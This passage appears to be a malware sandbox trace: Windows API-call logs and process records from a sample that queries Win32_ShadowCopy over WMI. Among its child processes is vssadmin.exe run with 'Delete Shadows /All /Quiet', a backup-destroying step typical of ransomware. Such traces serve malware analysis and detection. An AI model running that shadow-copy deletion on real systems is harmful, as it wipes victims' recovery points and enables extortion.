(lpString="CREATE") returned 6 [0254.288] lstrlenW (lpString="DELETE") returned 6 [0254.288] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="CREATE", cchCount2=6) returned 3 [0254.288] lstrlenW (lpString="DELETE") returned 6 [0254.288] lstrlenW (lpString="DELETE") returned 6 [0254.288] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="DELETE", cchCount1=6, lpString2="DELETE", cchCount2=6) returned 2 [0254.288] malloc (_Size=0xc) returned 0x2bbae18 [0254.288] lstrlenA (lpString="") returned 0 [0254.288] malloc (_Size=0x2) returned 0x2bb2720 [0254.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x2bb2720, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0254.288] free (_Block=0x2bb2720) [0254.288] malloc (_Size=0xc) returned 0x2bbae30 [0254.288] lstrlenA (lpString="") returned 0 [0254.288] malloc (_Size=0x2) returned 0x2bb2720 [0254.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x2bb2720, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0254.288] free (_Block=0x2bb2720) [0254.288] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0254.288] malloc (_Size=0x3e) returned 0x2bbb798 [0254.288] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0254.288] wcstok (in: _String="Select * from Win32_ShadowCopy", _Delimiter=" ", _Context=0xd37e15b0 | out: _String="Select", _Context=0xd37e15b0) returned="Select" [0254.288] malloc (_Size=0xc) returned 0x2bbada0 [0254.288] free (_Block=0x2bbae30) [0254.288] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd37e15b0 | out: _String=0x0, _Context=0xd37e15b0) returned="*" [0254.289] lstrlenW (lpString="FROM") returned 4 [0254.289] lstrlenW (lpString="*") returned 1 [0254.289] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0254.289] malloc (_Size=0xc) returned 0x2bbae30 [0254.289] free (_Block=0x2bbada0) [0254.289] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd37e15b0 | out: _String=0x0, _Context=0xd37e15b0) returned="from" [0254.289] lstrlenW (lpString="FROM") returned 4 [0254.289] lstrlenW (lpString="from") returned 4 [0254.289] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0254.289] malloc (_Size=0xc) returned 0x2bbada0 [0254.289] free (_Block=0x2bbae30) [0254.289] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0xd37e15b0 | out: _String=0x0, _Context=0xd37e15b0) returned="Win32_ShadowCopy" [0254.289] malloc (_Size=0xc) returned 0x2bbadb8 [0254.289] free (_Block=0x2bbada0) [0254.289] free (_Block=0x2bbb798) [0254.289] malloc (_Size=0xc) returned 0x2bbada0 [0254.290] malloc (_Size=0xc) returned 0x2bbadd0 [0254.290] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0254.290] SysStringLen (param_1="Win32_ShadowCopy") returned 0x10 [0254.290] free (_Block=0x2bbae18) [0254.290] free (_Block=0x2bbada0) [0254.290] ??0CHString@@QAE@XZ () returned 0x87f7a8 [0254.290] GetCurrentThreadId () returned 0x1298 [0254.291] malloc (_Size=0xc) returned 0x2bbada0 [0254.291] malloc (_Size=0xc) returned 0x2bbae18 [0254.291] malloc (_Size=0xc) returned 0x2bbae30 [0254.291] malloc (_Size=0xc) returned 0x2bbae48 [0254.291] malloc (_Size=0xc) returned 0x2bbaae8 [0254.291] SysStringLen (param_1="\\\\") returned 0x2 [0254.291] SysStringLen (param_1="NQDPDE") returned 0x6 [0254.291] malloc (_Size=0xc) returned 0x2bbab00 [0254.291] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0254.291] SysStringLen (param_1="\\") returned 0x1 [0254.291] malloc (_Size=0xc) returned 0x2bbab30 [0254.291] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0254.291] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0254.291] free (_Block=0x2bbab00) [0254.291] free (_Block=0x2bbaae8) [0254.291] free (_Block=0x2bbae48) [0254.291] free (_Block=0x2bbae30) [0254.291] free (_Block=0x2bbae18) [0254.291] free (_Block=0x2bbada0) [0254.291] malloc (_Size=0xc) returned 0x2bbada0 [0254.291] malloc (_Size=0xc) returned 0x2bbae18 [0254.292] malloc (_Size=0xc) returned 0x2bbae30 [0254.292] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2e84840, strNetworkResource="\\\\NQDPDE\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x2eb80a0) returned 0x0 [0254.302] free (_Block=0x2bbae30) [0254.302] free (_Block=0x2bbae18) [0254.303] free (_Block=0x2bbada0) [0254.303] CoSetProxyBlanket (pProxy=0x2eb80a0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0254.303] free (_Block=0x2bbab30) [0254.303] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0254.303] ??0CHString@@QAE@XZ () returned 0x87f798 [0254.303] GetCurrentThreadId () returned 0x1298 [0254.303] malloc (_Size=0xc) returned 0x2bbaae8 [0254.303] lstrlenA (lpString="") returned 0 [0254.303] malloc (_Size=0x2) returned 0x2bb2720 [0254.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x2bb2720, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0254.303] free (_Block=0x2bb2720) [0254.303] SysStringLen (param_1="SELECT * FROM Win32_ShadowCopy") returned 0x1e [0254.303] SysStringLen (param_1="") returned 0x0 [0254.303] free (_Block=0x2bbaae8) [0254.303] malloc (_Size=0xc) returned 0x2bbaae8 [0254.303] IWbemServices:ExecQuery (in: This=0x2eb80a0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_ShadowCopy", lFlags=0, pCtx=0x0, ppEnum=0x87f794 | out: ppEnum=0x87f794*=0x0) returned 0x80041014 [0256.180] free (_Block=0x2bbaae8) [0256.182] _CxxThrowException () [0256.184] malloc (_Size=0x10) returned 0x2bbaae8 [0256.184] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0256.184] free (_Block=0x2bbadb8) [0256.184] free (_Block=0x2bbadd0) [0256.184] GetCurrentThreadId () returned 0x1298 [0256.184] ??0CHString@@QAE@PBG@Z () returned 0x87f838 [0256.184] ??YCHString@@QAEABV0@PBG@Z () returned 0x87f838 [0256.186] ??0CHString@@QAE@XZ () returned 0x87f704 [0256.186] malloc (_Size=0xc) returned 0x2bbadb8 [0256.186] malloc (_Size=0xc) returned 0x2bbae18 [0256.186] SysStringLen (param_1="") returned 0x0 [0256.187] free (_Block=0x2bbadb8) [0256.187] CoCreateInstance (in: rclsid=0xa26a14*(Data1=0xeb87e1bd, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a24*(Data1=0xeb87e1bc, Data2=0x3233, Data3=0x11d2, Data4=([0]=0xae, [1]=0xc9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0x88, [7]=0x20)), ppv=0xa6857c | out: ppv=0xa6857c*=0x2e8bb60) returned 0x0 [0256.194] WbemStatusCodeText:IWbemStatusCodeText:GetErrorCodeText (in: This=0x2e8bb60, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x87f708 | out: MessageText=0x87f708*="Initialization failure\r\n") returned 0x0 [0256.197] free (_Block=0x2bbae18) [0256.197] malloc (_Size=0xc) returned 0x2bbae18 [0256.198] WbemStatusCodeText:IWbemStatusCodeText:GetFacilityCodeText (in: This=0x2e8bb60, hRes=0x80041014, LocaleId=0x0, lFlags=0, MessageText=0x87f70c | out: MessageText=0x87f70c*="WMI") returned 0x0 [0256.198] malloc (_Size=0xc) returned 0x2bbae30 [0256.198] lstrlenW (lpString="WMI") returned 3 [0256.198] lstrlenW (lpString="Wbem") returned 4 [0256.198] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Wbem", cchCount1=4, lpString2="WMI", cchCount2=3) returned 1 [0256.198] lstrlenW (lpString="WMI") returned 3 [0256.198] lstrlenW (lpString="WMI") returned 3 [0256.198] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="WMI", cchCount1=3, lpString2="WMI", cchCount2=3) returned 2 [0256.199] WbemStatusCodeText:IUnknown:Release (This=0x2e8bb60) returned 0x0 [0256.199] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0256.199] LoadStringW (in: hInstance=0x0, uID=0xb7f3, lpBuffer=0x87ef64, cchBufferMax=1024 | out: lpBuffer="ERROR:\r\nDescription = %1") returned 0x18 [0256.200] FormatMessageW (in: dwFlags=0x2500, lpSource=0x87ef64, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x87ef4c, nSize=0x0, Arguments=0x87ef50 | out: lpBuffer="곈˫琬˪") returned 0x2e [0256.200] malloc (_Size=0xc) returned 0x2bbae48 [0256.200] LocalFree (hMem=0x2ebacc8) returned 0x0 [0256.200] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 47 [0256.200] malloc (_Size=0x2f) returned 0x2bbb898 [0256.200] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="ERROR:\r\nDescription = Initialization failure\r\n", cchWideChar=-1, lpMultiByteStr=0x2bbb898, cbMultiByte=47, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ERROR:\r\nDescription = Initialization failure\r\n", lpUsedDefaultChar=0x0) returned 47 [0256.200] __iob_func () returned 0x776f2608 [0256.200] fprintf (in: _File=0x776f2648, _Format="%s" | out: _File=0x776f2648) returned 46 [0256.201] __iob_func () returned 0x776f2608 [0256.201] fflush (in: _File=0x776f2648 | out: _File=0x776f2648) returned 0 [0256.201] free (_Block=0x2bbb898) [0256.201] free (_Block=0x2bbae48) [0256.201] free (_Block=0x2bbae30) [0256.201] free (_Block=0x2bbae18) [0256.201] ??1CHString@@QAE@XZ () returned 0x1 [0256.201] ??0CHString@@QAE@PBG@Z () returned 0x87f840 [0256.201] ??YCHString@@QAEABV0@PBG@Z () returned 0x87f840 [0256.201] GetCurrentThreadId () returned 0x1298 [0256.201] ??1CHString@@QAE@XZ () returned 0x1 [0256.201] WbemLocator:IUnknown:Release (This=0x2eb80a0) returned 0x0 [0256.202] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0256.202] free (_Block=0x2bbaae8) [0256.202] _kbhit () returned 0x0 [0256.209] free (_Block=0x2bb0598) [0256.209] free (_Block=0x2bbac38) [0256.209] free (_Block=0x2bbaad0) [0256.209] free (_Block=0x2bbabd8) [0256.209] free (_Block=0x2bbac20) [0256.209] free (_Block=0x2bb9da8) [0256.209] free (_Block=0x2bb2a48) [0256.209] free (_Block=0x2bbb760) [0256.209] free (_Block=0x2bbae00) [0256.210] free (_Block=0x2bbb6e0) [0256.210] free (_Block=0x2bbade8) [0256.210] free (_Block=0x2bb2ba8) [0256.210] free (_Block=0x2bbb750) [0256.210] free (_Block=0x2bb0520) [0256.210] free (_Block=0x2bbb728) [0256.210] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0256.210] free (_Block=0x2bb0568) [0256.210] free (_Block=0x2bb2b88) [0256.210] free (_Block=0x2bbac68) [0256.210] free (_Block=0x2bb11d0) [0256.210] free (_Block=0x2bb2668) [0256.210] free (_Block=0x2bb26b0) [0256.210] free (_Block=0x2bbad88) [0256.210] free (_Block=0x2bb2760) [0256.210] free (_Block=0x2bb0508) [0256.210] free (_Block=0x2bb2b28) [0256.210] free (_Block=0x2bb04f0) [0256.210] free (_Block=0x2bb2ca8) [0256.210] free (_Block=0x2bb04d8) [0256.210] free (_Block=0x2bb2b68) [0256.210] free (_Block=0x2bb2890) [0256.210] free (_Block=0x2bb28a8) [0256.210] free (_Block=0x2bb2858) [0256.211] free (_Block=0x2bb2870) [0256.211] free (_Block=0x2bb28c8) [0256.211] free (_Block=0x2bb28e0) [0256.211] free (_Block=0x2bb04a0) [0256.211] free (_Block=0x2bb04b8) [0256.211] free (_Block=0x2bb27e8) [0256.211] free (_Block=0x2bb2800) [0256.211] free (_Block=0x2bb27b0) [0256.211] free (_Block=0x2bb27c8) [0256.211] free (_Block=0x2bb2820) [0256.211] free (_Block=0x2bb2838) [0256.211] free (_Block=0x2bb2778) [0256.211] free (_Block=0x2bb2790) [0256.211] free (_Block=0x2bb2738) [0256.211] free (_Block=0x2bb26f8) [0256.211] free (_Block=0x2bbaed8) [0256.211] WbemLocator:IUnknown:Release (This=0x2e84840) returned 0x2 [0256.215] WbemLocator:IUnknown:Release (This=0x2eb7fb0) returned 0x0 [0256.217] WbemLocator:IUnknown:Release (This=0x2e8afa0) returned 0x0 [0256.217] WbemLocator:IUnknown:Release (This=0x2e84840) returned 0x1 [0256.217] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0256.218] WbemLocator:IUnknown:Release (This=0x2e84840) returned 0x0 [0256.218] free (_Block=0x2bbad70) [0256.218] free (_Block=0x2bbaba8) [0256.218] free (_Block=0x2bb2c68) [0256.218] free (_Block=0x2bbabc0) [0256.218] free (_Block=0x2bbace0) [0256.218] free (_Block=0x2bb29e8) [0256.218] free (_Block=0x2bbab90) [0256.218] free (_Block=0x2bbac50) [0256.218] free (_Block=0x2bb2948) [0256.218] free (_Block=0x2bbabf0) [0256.218] free (_Block=0x2bbaab8) [0256.218] free (_Block=0x2bb2c28) [0256.218] free (_Block=0x2bbab78) [0256.218] free (_Block=0x2bbad10) [0256.218] free (_Block=0x2bb2c08) [0256.218] free (_Block=0x2bbad40) [0256.219] free (_Block=0x2bbacf8) [0256.219] free (_Block=0x2bb2ae8) [0256.219] free (_Block=0x2bbac98) [0256.219] free (_Block=0x2bbab48) [0256.219] free (_Block=0x2bb2a28) [0256.219] free (_Block=0x2bbacc8) [0256.219] free (_Block=0x2bbab18) [0256.219] free (_Block=0x2bb2b08) [0256.219] free (_Block=0x2bb9940) [0256.219] free (_Block=0x2bbacb0) [0256.219] free (_Block=0x2bb2b48) [0256.219] free (_Block=0x2bbad58) [0256.219] free (_Block=0x2bbaaa0) [0256.219] free (_Block=0x2bb2be8) [0256.219] free (_Block=0x2bbac08) [0256.219] free (_Block=0x2bbad28) [0256.219] free (_Block=0x2bb29a8) [0256.219] free (_Block=0x2bbaa88) [0256.220] free (_Block=0x2bbac80) [0256.220] free (_Block=0x2bb2988) [0256.220] free (_Block=0x2bb98f8) [0256.220] free (_Block=0x2bb9958) [0256.220] free (_Block=0x2bb2a68) [0256.220] free (_Block=0x2bb97f0) [0256.220] free (_Block=0x2bb9880) [0256.220] free (_Block=0x2bb2ac8) [0256.220] free (_Block=0x2bb99b8) [0256.220] free (_Block=0x2bb9928) [0256.220] free (_Block=0x2bb2aa8) [0256.220] free (_Block=0x2bb9898) [0256.220] free (_Block=0x2bb9970) [0256.220] free (_Block=0x2bb2968) [0256.220] free (_Block=0x2bb9910) [0256.220] free (_Block=0x2bb98c8) [0256.220] free (_Block=0x2bb29c8) [0256.220] free (_Block=0x2bb9808) [0256.220] free (_Block=0x2bb99a0) [0256.221] free (_Block=0x2bb2cc8) [0256.221] free (_Block=0x2bb9850) [0256.221] free (_Block=0x2bb9820) [0256.221] free (_Block=0x2bb2ce8) [0256.221] free (_Block=0x2bb9838) [0256.221] free (_Block=0x2bb98b0) [0256.221] free (_Block=0x2bb2c48) [0256.221] free (_Block=0x2bb9868) [0256.221] free (_Block=0x2bb98e0) [0256.221] free (_Block=0x2bb2928) [0256.221] CoUninitialize () [0256.262] exit (_Code=-2147217388) [0256.262] free (_Block=0x2bbae60) [0256.262] free (_Block=0x2bb0f90) [0256.263] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0256.263] free (_Block=0x2bb2d98) [0256.263] free (_Block=0x2bb1218) [0256.263] free (_Block=0x2bb0f70) [0256.263] free (_Block=0x2bb0f50) [0256.263] free (_Block=0x2bb0f20) [0256.263] free (_Block=0x2bb0f00) [0256.263] free (_Block=0x2bb0ed0) [0256.263] free (_Block=0x2bb0e90) [0256.263] free (_Block=0x2bb0e70) [0256.263] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0256.263] free (_Block=0x2bbaf60) Thread: id = 78 os_tid = 0x6a4 Thread: id = 79 os_tid = 0x7b8 Thread: id = 80 os_tid = 0x860 Thread: id = 81 os_tid = 0xbec Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x742fe000" os_pid = "0x3ac" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "7" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\lfsvc" [0xa], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xa], "NT SERVICE\\wuauserv" [0xa], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 82 os_tid = 0x1238 Thread: id = 83 os_tid = 0xf84 Thread: id = 84 os_tid = 0xf7c Thread: id = 85 os_tid = 0x6c4 Thread: id = 86 os_tid = 0x1040 Thread: id = 87 os_tid = 0xf6c Thread: id = 88 os_tid = 0x1244 Thread: id = 89 os_tid = 0xf68 Thread: id = 90 os_tid = 0xd50 Thread: id = 91 os_tid = 0x110c Thread: id = 92 os_tid = 0x10fc Thread: id = 93 os_tid = 0x109c Thread: id = 94 os_tid = 0x12a8 Thread: id = 95 os_tid = 0x12a0 Thread: id = 96 os_tid = 0x129c Thread: id = 97 os_tid = 0x1278 Thread: id = 98 os_tid = 0x1198 Thread: id = 99 os_tid = 0x1194 Thread: id = 100 os_tid = 0x1190 Thread: id = 101 os_tid = 0x118c Thread: id = 102 os_tid = 0x1188 Thread: id = 103 os_tid = 0x1184 Thread: id = 104 os_tid = 0x10e8 Thread: id = 105 os_tid = 0xfc0 Thread: id = 106 os_tid = 0xd4c Thread: id = 107 os_tid = 0xc20 Thread: id = 108 os_tid = 0xd00 Thread: id = 109 os_tid = 0xb68 Thread: id = 110 os_tid = 0xb90 Thread: id = 111 os_tid = 0xb70 Thread: id = 112 os_tid = 0x29c Thread: id = 113 os_tid = 0xbd8 Thread: id = 114 os_tid = 0x60 Thread: id = 115 os_tid = 0xab0 Thread: id = 116 os_tid = 0xd38 Thread: id = 117 os_tid = 0xd68 Thread: id = 118 os_tid = 0xaa0 Thread: id = 119 os_tid = 0xa30 Thread: id = 120 os_tid = 0xa14 Thread: id = 121 os_tid = 0xa0c Thread: id = 122 os_tid = 0x9e8 Thread: id = 123 os_tid = 0x9e0 Thread: id = 124 os_tid = 0x9d8 Thread: id = 125 os_tid = 0x9cc Thread: id = 126 os_tid = 0x9c4 Thread: id = 127 os_tid = 0x9b8 Thread: id = 128 os_tid = 0x9b0 Thread: id = 129 os_tid = 0x9a0 Thread: id = 130 os_tid = 0x998 Thread: id = 131 os_tid = 0x984 Thread: id = 132 os_tid = 0x978 Thread: id = 133 os_tid = 0x968 Thread: id = 134 os_tid = 0x95c Thread: id = 135 os_tid = 0x958 Thread: id = 136 os_tid = 0x944 Thread: id = 137 os_tid = 0x930 Thread: id = 138 os_tid = 0x914 Thread: id = 139 os_tid = 0x8ac Thread: id = 140 os_tid = 0x840 Thread: id = 141 os_tid = 0x83c Thread: id = 142 os_tid = 0x430 Thread: id = 143 os_tid = 0x7c0 Thread: id = 144 os_tid = 0x7bc Thread: id = 145 os_tid = 0x7ac Thread: id = 146 os_tid = 0x784 Thread: id = 147 os_tid = 0x780 Thread: id = 148 os_tid = 0x77c Thread: id = 149 os_tid = 0x6fc Thread: id = 150 os_tid = 0x678 Thread: id = 151 os_tid = 0x670 Thread: id = 152 os_tid = 0x660 Thread: id = 153 os_tid = 0x654 Thread: id = 154 os_tid = 0x61c Thread: id = 155 os_tid = 0x5d0 Thread: id = 156 os_tid = 0x5a0 Thread: id = 157 os_tid = 0x4ac Thread: id = 158 os_tid = 0x41c Thread: id = 159 os_tid = 0x414 Thread: id = 160 os_tid = 0x404 Thread: id = 161 os_tid = 0x158 Thread: id = 162 os_tid = 0x39c Thread: id = 163 os_tid = 0x2e8 Thread: id = 164 os_tid = 0x180 Thread: id = 165 os_tid = 0x234 Thread: id = 166 os_tid = 0x26c Thread: id = 167 os_tid = 0x2a0 Thread: id = 168 os_tid = 0x170 Thread: id = 169 os_tid = 0x1a8 Thread: id = 170 os_tid = 0x16c Thread: id = 171 os_tid = 0x3b0 Thread: id = 190 os_tid = 0xb9c Thread: id = 191 os_tid = 0x42c Thread: id = 192 os_tid = 0xea8 Thread: id = 193 os_tid = 0xee4 Thread: id = 229 os_tid = 0x1280 Thread: id = 230 os_tid = 0x124c Thread: id = 243 os_tid = 0x1364 Thread: id = 292 os_tid = 0xf04 Thread: id = 293 os_tid = 0xf88 Thread: id = 294 os_tid = 0x134 Thread: id = 301 os_tid = 0x10a8 Process: id = "9" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x9c28000" os_pid = "0x1380" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0009db87" [0xc000000f] Thread: id = 172 os_tid = 0x1354 Thread: id = 173 os_tid = 0x134c Thread: id = 174 os_tid = 0x1350 Thread: id = 175 os_tid = 0x12f4 Thread: id = 176 os_tid = 0x12fc Thread: id = 177 os_tid = 0x1330 Thread: id = 178 os_tid = 0x1384 Thread: id = 179 os_tid = 0x1328 Thread: id = 180 os_tid = 0x1334 Thread: id = 181 os_tid = 0x1320 Thread: id = 218 os_tid = 0x1038 Thread: id = 219 os_tid = 0x10f0 Thread: id = 220 os_tid = 0xeb0 Process: id = "10" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x37e1d000" os_pid = "0x10b4" os_integrity_level = "0x4000" os_privileges = "0x1e60b1e890" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xe], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\dmwappushservice" [0xa], "NT SERVICE\\DoSvc" [0xa], "NT SERVICE\\DsmSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\lfsvc" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\NcaSvc" [0xa], "NT SERVICE\\NetSetupSvc" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\UsoSvc" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wisvc" [0xa], "NT SERVICE\\wlidsvc" [0xa], "NT SERVICE\\WpnService" [0xe], "NT SERVICE\\wuauserv" [0xa], "S-1-5-80-603222039-1779857981-708438124-1730083285-3435298639" [0xa], "NT SERVICE\\XboxNetApiSvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:00009f6a" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 182 os_tid = 0x10d8 Thread: id = 183 os_tid = 0x10d4 Thread: id = 184 os_tid = 0x10d0 Thread: id = 185 os_tid = 0x10cc Thread: id = 186 os_tid = 0x10c8 Thread: id = 187 os_tid = 0x10c4 Thread: id = 188 os_tid = 0x10c0 Thread: id = 189 os_tid = 0x10b8 Process: id = "11" image_name = "wmiprvse.exe" filename = "c:\\windows\\syswow64\\wbem\\wmiprvse.exe" page_root = "0x1b246000" os_pid = "0xee0" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000a7ecf" [0xc000000f] Thread: id = 194 os_tid = 0xf18 Thread: id = 195 os_tid = 0xe14 Thread: id = 196 os_tid = 0xf24 Thread: id = 197 os_tid = 0xd94 Thread: id = 198 os_tid = 0xafc Thread: id = 199 os_tid = 0x1004 Thread: id = 200 os_tid = 0xd9c Thread: id = 201 os_tid = 0xe78 Thread: id = 202 os_tid = 0xf64 Process: id = "12" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x21618000" os_pid = "0xa10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\system32\\vssadmin.exe\" Delete Shadows /All /Quiet" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" 